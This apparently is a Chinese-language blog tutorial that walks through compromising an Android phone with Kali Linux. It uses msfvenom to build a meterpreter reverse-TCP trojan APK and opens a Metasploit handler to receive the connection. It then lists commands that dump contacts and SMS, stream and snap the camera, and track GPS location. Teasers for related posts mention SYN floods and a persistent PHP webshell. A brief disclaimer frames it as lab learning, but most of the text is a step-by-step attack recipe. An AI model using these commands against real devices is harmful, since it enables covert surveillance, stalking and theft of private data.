首页 > 其他分享 >使用 kali 渗透测试局域网手机

使用 kali 渗透测试局域网手机

时间:2023-06-11 18:34:21浏览次数:40  
标签:渗透 kali 端口 如下 apk 指令 android 局域网

本文实验旨在简单介绍下使用 kali 渗透测试局域网手机,实验环境均在VMware虚拟机内,并无涉及真实IP地址。若因传播或利用本文所提供的信息而造成任何直接或间接的后果,均由使用者本人负责,作者不为此承担任何责任!

 

测试环境如下:

kali虚拟机:攻击机。
win10中间机:用于将kali生成的远程木马发送到Android手机中。
Android手机:靶机。
Xshell4:用于将在kali上生成的远程木马从kali中导到win10中间机中。

 

下面开始:

打开kali利用msfvenom生成木马文件,payload选择android/meterpreter/reverse_tcp,后接Kali虚拟机IP地址和端口,指令如下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=Kali虚拟机IP地址 LPORT=端口 R > /root/android.apk

(记住上面输入的这个端口,这里暂且标注为端口A,因为最后需要用到这个端口。)

之后可以用 ls 指令查看生成的文件(android.apk)。

后面,利用win10中的Xshell4将kali中生成的android.apk传送到指定路径,让Android靶机安装,如下所示:

下面是设置为kali的名字、kali虚拟机的IP地址和端口:

下面是指定文件(android.apk)的路径:

用 sz 文件名这个指令,将文件传到指定路径,如下所示:

sz android.apk

传送该文件是为了方便靶机安装,传送完成之后,让靶机安装该 android.apk 文件,待目标靶机上安装完成后,在 kali 启动 msfconsole 如下所示(开启并使用 msf 中监听):

msfconsole

用以下指令加载模块:

use exploit/multi/handler

选择 payload 如下所示:

set payload android/meterpreter/reverse_tcp

最后,分别使用以下指令,即可开始执行漏洞,开启监听等待目标上线:

set LHOST kali虚拟机IP地址
set LPORT 端口A(就是一开始生成android.apk时所填入的端口)
exploit

现在,在目标手机上点一下文件,该文件是没有页面的,但是点一下就已经成功建立攻击会话了,kali提示如下:

成功拿到msf中会建立会话后,执行如下指令查看系统信息:

sysinfo

执行如下指令查看安装app文件:

app_list

执行如下指令检测系统root:

check_root

执行如下指令下载通讯录信息:

dump_contacts

执行如下指令获取摄像头信息:

webcam_list

执行如下指令开启摄像头:

webcam_stream

执行如下指令远程控制对方手机拍摄一张照片:

webcam_snap

用如下指令远程控制对方手机开起视频聊天:

webcam_chat

用如下指令实时查看对方手机的信息:

dump_sms

用如下指令实时获取对方手机GPS定位:

geolocate

本文到这里就结束了。

总结,我的教学仅供大家学习使用,希望可以对kali linux有一些心得,切莫用于违法用途。

标签:渗透,kali,端口,如下,apk,指令,android,局域网
From: https://www.cnblogs.com/n5you/p/17473347.html

相关文章

  • 利用Kali进行简单的 SYN FLOOD 攻击测试
    本文实验旨在简单介绍下使用kali的自带工具hping3进行SYNFLOOD(属于典型的DOS/DDOS攻击)测试攻击,实验环境均在VMware虚拟机内,并无涉及真实IP地址。若因传播或利用本文所提供的信息而造成任何直接或间接的后果,均由使用者本人负责,作者不为此承担任何责任!打开Kali虚拟机后,进入管理......
  • kali开启ssh端口连接xshell
    先记一下主要命令启动ssh服务:systemctlstartssh.servicenetstat-lnt:再次查看端口状态,可以看到22端口已经成功开启第一步编辑ssh文件 vi/etc/ssh/sshd_config 将其修改为第二步重启ssh/etc/init.d/sshrestart重启或者servicesshstart重启/etc/init.d/sshstatu......
  • 后渗透之权限维持
    内存马(不死马)最常见的内存马<?phpset_time_limit(0); #用来设置脚本最大的执行时间,如果为0的话,就会一直执行这个脚本,设置其他数字的话,则按照设置的秒数来进行执行,注意,执行时间和php.ini里的max_execution_time设置有很大的关系,真实时间的计算公式是max_execution_time+time......
  • 记录一次新手渗透的过程
    这是严格意义上的第一次动手实操,相对于无限的理论学习与记忆,我个人是觉得让我动手操作一次让我的收获更大。目标靶机:http://testphp.vulnweb.com/工具使用:KaliLinux参考文档:   【渗透测试】渗透测试最强秘籍(Part1:信息收集)–绿盟科技技术博客(nsfocus.net)明确目标之......
  • Kali 渗透测试工具 Metasploit 的使用
    Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 文件结构与模块:路径:/usr/share/metasploit-framework/config:MSF环境配置信息,数据库配置信息data:后渗透模块的一些工具及pa......
  • Web安全-渗透测试-基础知识06
    加密编码算法在渗透测试中,常见的密码等敏感信息会采用加密处理,其中作为安全测试人员必须要了解常见的加密方式,才能为后续的安全测试做好准备加密算法的种类加密算法分为可逆、不可逆加密算法,而不可逆加密算法又分为对称加密和非对称加密不可逆加密:不可逆加密算法最大的特......
  • Kali Linux - 网站渗透测试
    CMS扫描工具:wpscan 是一个黑盒子WordPress漏洞扫描程序,可用于扫描远程WordPress安装以查找安全问题。我在网络上找到的使用方法如下:wpscan-u网页网址但这个指令根本无法使用,使用以下指令查看后:wpscan-h发现得用以下指令才对:wpscan--url域名地址之后给的提示如......
  • Kali 用 Wireshark 抓取网络数据包
    这个Wireshark是可视化操作工具,可以直接打开。如下图所示,如果是中文版的,可以直接操作:如果是英文版的,就点击Capture后,选择Options打开如下窗口:以上,我们可以选择eth0或Kiioback:io进行抓包,这里每个人的接口可能不一样,选择好后点击开始(start)。开始后,如下图所示:非常简......
  • Kali 信息收集工具:子域、端口、目录、交互等
    子域名查询工具:Fierce是使用多种技术来扫描目标主机IP地址和主机名的一个DNS服务器枚举工具。运用递归的方式来工作。它的工作原理是先通过查询本地DNS服务器来查找目标DNS服务器,然后使用目标DNS服务器来查找子域名。fierce的主要特点就是可以用来定位独立IP空间对应域名和主机......
  • 注册、登录和找回密码渗透
    1、是否注册-sql注入在注册、登录和找回密码处,输入手机号或邮箱、账号名,前端请求是否注册2、是否注册-xss用于是否注册的参数,返回之后可能构成xss3、请求验证码-短信/邮件轰炸轰炸注册、登录和找回密码处,输入手机号或邮箱,如果没有频率限制,可能造成短信/邮件轰炸,干扰用户正常......